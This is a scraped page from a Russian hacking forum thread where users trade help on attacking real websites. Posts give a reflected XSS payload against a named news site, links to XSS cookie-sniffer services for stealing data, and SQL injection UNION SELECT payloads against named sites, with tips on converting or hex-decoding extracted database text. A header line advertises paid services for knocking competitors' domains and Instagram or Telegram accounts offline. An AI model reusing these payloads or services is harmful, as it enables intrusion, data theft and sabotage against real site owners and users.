УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2178 из 2438

2178

Опции темы

Поиск в этой теме

Опции просмотра

#21771

05.12.2012, 16:00

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

Цитата:

Сообщение от c0n

c0n said:
Никак не получается раскрутить вот это:
http://www.popmech.ru/templates/admin/functions/wysiwyg/admin_wysiwyg_iframe.php?area=full_area&dir=%22%3E %3C/head%3E%3Cbody%3E%3Cimg+src=http://img.yandex.net/i/www/logo.png%3E

Там же xss обычная

#21772

05.12.2012, 16:11

c0n

Познающий

Регистрация: 04.02.2006

Сообщений: 33

Провел на форуме:
73163

Репутация: 3

Цитата:

Сообщение от BigBear

BigBear said:
Это Пассивная XSS. Потому я и удалил её из той темы.
Что требуется то ??

Я так и понял. Просто набрел случайно. Вот решил посмотреть, что с таким сделать можно.

#21773

05.12.2012, 16:16

c0n

Познающий

Регистрация: 04.02.2006

Сообщений: 33

Провел на форуме:
73163

Репутация: 3

Цитата:

Сообщение от SVAROG

SVAROG said:
Там же xss обычная

Не на всех браузерах такое замечательное окошко всплывает. Вроде фильтрация еще имеет место быть.

Спасибо.

Когда-то давно был сниффер на античате. Пропал?

Что можно сделать?

#21774

05.12.2012, 19:04

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от c0n

c0n said:
Не на всех браузерах такое замечательное окошко всплывает.
Вроде фильтрация еще имеет место быть.
Спасибо.
Когда-то давно был сниффер на античате. Пропал?
Что можно сделать?

Вот тебе снифер

Цитата:

Сообщение от None

http://madnet.name/files/1/9.html

Только не спрашивай как его заюзать, а лудше почитай статьи про XSS!

#21775

06.12.2012, 00:53

kise

Guest

Сообщений: n/a

Провел на форуме:
17281

Репутация: -4

Возможно задам довольно глупый вопрос, но как мне вывести запрос из mysql inj в нужной мне кодировке ?

К примеру есть запрос:

GET /index.php?sth=999999.9+union+all+select+text,2,3+f rom+art--

При этом вывод из бд в кодировке UTF-8, а кодировка сайта WINDOWS-1251 (cp1251). Как мне сделать так, чтобы вывод был в кодировке cp1251 ?

Вообще(вроде), это можно сделать так:

SET NAMES cp1251

SET CHARACTER SET cp1251

Но как мне все это объединить в один запрос ?

#21776

06.12.2012, 02:09

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28262

Репутация: 23

Цитата:

Сообщение от kise

kise said:
Возможно задам довольно глупый вопрос, но как мне вывести запрос из mysql inj в нужной мне кодировке ?
К примеру есть запрос:
GET /index.php?sth=999999.9+union+all+select+text,2,3+f rom+art--
При этом вывод из бд в кодировке UTF-8, а кодировка сайта WINDOWS-1251 (cp1251). Как мне сделать так, чтобы вывод был в кодировке cp1251 ?
Вообще(вроде), это можно сделать так:
SET NAMES cp1251
SET CHARACTER SET cp1251
Но как мне все это объединить в один запрос ?

Здесь два варианта, либо юзать cast() или CONVERT(),либо шифровать и дешифровать данные, типа: unhex(hex(version())), в вашем случаи, это будет выглядеть так:

/index.php?sth=999999.9+union+all+select+CONVERT(te xt+using+latin1),2,3+from+art--, либо же:

/index.php?sth=999999.9+union+all+select+unhex(hex( text)),2,3+from+art--, и потом воспользоваться например: http://www.string-functions.com/hex-string.aspx для расшифровки полученного результата

#21777

06.12.2012, 03:01

kise

Guest

Сообщений: n/a

Провел на форуме:
17281

Репутация: -4

/index.php?sth=999999.9+union+all+select+CONVERT("заголовок - "+USING+cp1251),CONVERT(title+USING+cp1251),3+from+ art--

Вот так, выводится заголовок из статьи правильно, но вот"заголовок-" => "СЃРєР°С‡Р°С‚СЊ" . В чем проблема ?

#21778

06.12.2012, 12:55

narviss

Guest

Сообщений: n/a

Провел на форуме:
2851

Репутация: 0

Ограничение в строке на длину походу, вообще первый раз с таким фильтром встречаюсь.

Цитата:

Сообщение от None

www.fernando9torres.com/index.php?p=1

#21779

06.12.2012, 13:01

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от narviss

narviss said:
Ограничение в строке на длину походу, вообще первый раз с таким фильтром встречаюсь.

Отправь пост запрос

http://www.fernando9torres.com

p=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20--+

#21780

06.12.2012, 13:41

c0n

Познающий

Регистрация: 04.02.2006

Сообщений: 33

Провел на форуме:
73163

Репутация: 3

Цитата:

Сообщение от winstrool

winstrool said:
Вот тебе снифер
Только не спрашивай как его заюзать, а лудше почитай статьи про
XSS
!

Как юзать знаю.

Просто раньше на античате был рабочий онлайн сниффер. Теперь придется хостера искать

Что делать знаю.

Спасибо.

А сниффер вот этот http://www.kanicq.ru/sniffer/

Страница 2178 из 2438

2178

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)

Быстрый переход